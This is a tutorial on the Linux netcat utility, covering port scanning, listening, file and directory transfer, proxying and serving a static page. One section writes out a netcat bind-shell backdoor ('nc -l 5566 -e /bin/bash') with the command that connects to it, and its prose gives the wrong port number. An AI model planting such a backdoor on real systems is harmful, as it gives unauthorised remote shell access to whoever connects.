This comprehensive Linux guide expects that you run the following commands as root user but if you decide to run the commands as a different user then ensure that the user has sudo access and that you precede each of the privileged commands with sudo

netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.

It works similarly to the cat command but it is for the network. It reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to the linux users as it is called the Swiss Army Knife of networking tools. It is most oftenly used by networking specialists to monitor, test and send data across a network.

In this tutorial, we will show you the use of the netcat command with multiple examples.

Installing netcat Command

To install netcat command on your linux machine, you can run the following command

On Debian Based Systems

[email protected]:~$ apt install netcat

On Red-Hat Based Systems Or CentOS

[email protected]:~$ yum install nmap-ncat

General Syntax

Following is the general syntax of the netcat

[email protected]:~$ netcat [options] host port
OR
[email protected]:~$ ncat [options] host port
OR
[email protected]:~$ nc [options] host port

Using netcat For Port Scanning

netcat is most commenly used for port scanning. You can scan a single port as well as multiple ports or a range of ports. You can use the option -z for only scanning the open ports without sending any data and option -v to get a more detailed output.

[email protected]:~$ nc -z -v 155.138.206.18 80

Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) open

If you want to display only the open ports, you can filter the output through the grep command like this

[email protected]:~$ nc -z -v 155.138.206.18 80-300 | grep succeeded 

Listening To Inbound Connections

You can also use this command to listen to inbound connections to your systems by using the option -l with a specific port to listen from.

[email protected]:~$ nc -l port

[email protected]:~$ nc -l 8080

Connecting To A System Remotely

You can connect to another system remotely using this command. You can run the command like below

[email protected]:~$ nc IP_Address Port

[email protected]:~$ nc 192.168.1.1 80

Checking Server Software And It’s Version

You can also use netcat command to find the server software and it’s version by sending the “EXIT” command to the server on the default SSH port 22 like below:

[email protected]:~$ echo "EXIT" | nc 155.138.206.18 22

SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.

Chatting With A Remote System

You can also use netcat command to make a chat system between one host and another. First, you need to set up a host to listen through a specific port. Then you need to connect to that host using that port on your system.

From Server side

[email protected]:~$ nc -l 4444

From Client Side

[email protected]:~$ nc server-IP 4444

Replace the “host-IP” with the IP of the host that is listening for an inbound connection.

Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.

Sending/Receiving Files

You can also use netcat command to send or receive files from one host to another. For this, you first need to start the listener on the system on which the file is to be received.

[email protected]:~$ nc -l 4444 > file.txt

Now, you can send the file from the other host using this port by running the command like this

[email protected]:~$ nc host-IP 4444 < file.txt

Replace the “host-IP” with the IP of the host that is listening for the file to be received.

Sending/Receiving Directory

If you want to send a directory using netcat command, you first need to make an archive of that directory using tar command and then send it over using the netcat command.

[email protected]:~$ tar czvf - /path/to/directory | nc host-IP 4444

Then you can receive the file and extract it using the command like this

[email protected]:~$ nc -l 4444 | tar xzvf -

Using netcat As Proxy

You can also use netcat command as a proxy for your system.

[email protected]:~$ nc -l 4444 | nc 192.168.100.1 40

Now all the connections coming to our server on port 4444 will be automatically redirected to 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so:

[email protected]:~$ mkfifo 2way
[email protected]:~$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way

After this command, you will be able to send a receive data over proxy.

Using UDP Ports

If you want to scan UDP ports, you can just add the option -u with the command

[email protected]:~$ nc -u -z -v 192.168.100.1 80-200

192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) open

Similarly, you can add this option to any netcat command to implement it on the UDP ports.

Creating A Backdoor Using netcat Command

You can also use netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:

[email protected]:~$ nc -l 5566 -e /bin/bash

-e flag attaches a bash to port 10000. Now a client can connect to port 10000 on server & will have complete access to our system via bash by running the command like this:

[email protected]:~$ nc 192.168.100.1 5566

Running A Web Server With A Static Page Using netcat

You can also start a web server using the netcat command on a local host that will open a static web page “sample.html”. To perform this, you can run the command like this

First, make a new file with the name “sample.html” and copy the following code into the file.

<html>
        <head>
                <title>Test Page</title>
        </head>
        <body>
                <h1>Level 1 header</h1>
                <h2>Subheading</h2>
                <p>Normal text here</p>
        </body>
</html>

Then run the following command:

[email protected]:~$ while true; do sudo nc -lp 80 < sample.html; done

After this, you can access the page on by going to “http://server-IP.com/sample.html”

Setting The Connection Timeout

If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command.

[email protected]:~$ nc -w 10 192.168.100.1 4444

Making The Server Persistent

The server will terminate automatically when the client disconnects from it. To make the server to listen to more connections even when a client disconnects, you can use the option -k with the netcat command.

[email protected]:~$ nc -l -k 4444

Performing HTTP Request

You can also use this command to send various HTTP requests to a remote server.

For example, if you want to retrieve the netcat main page from the OpenBSD web site, run this command:

[email protected]:~$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80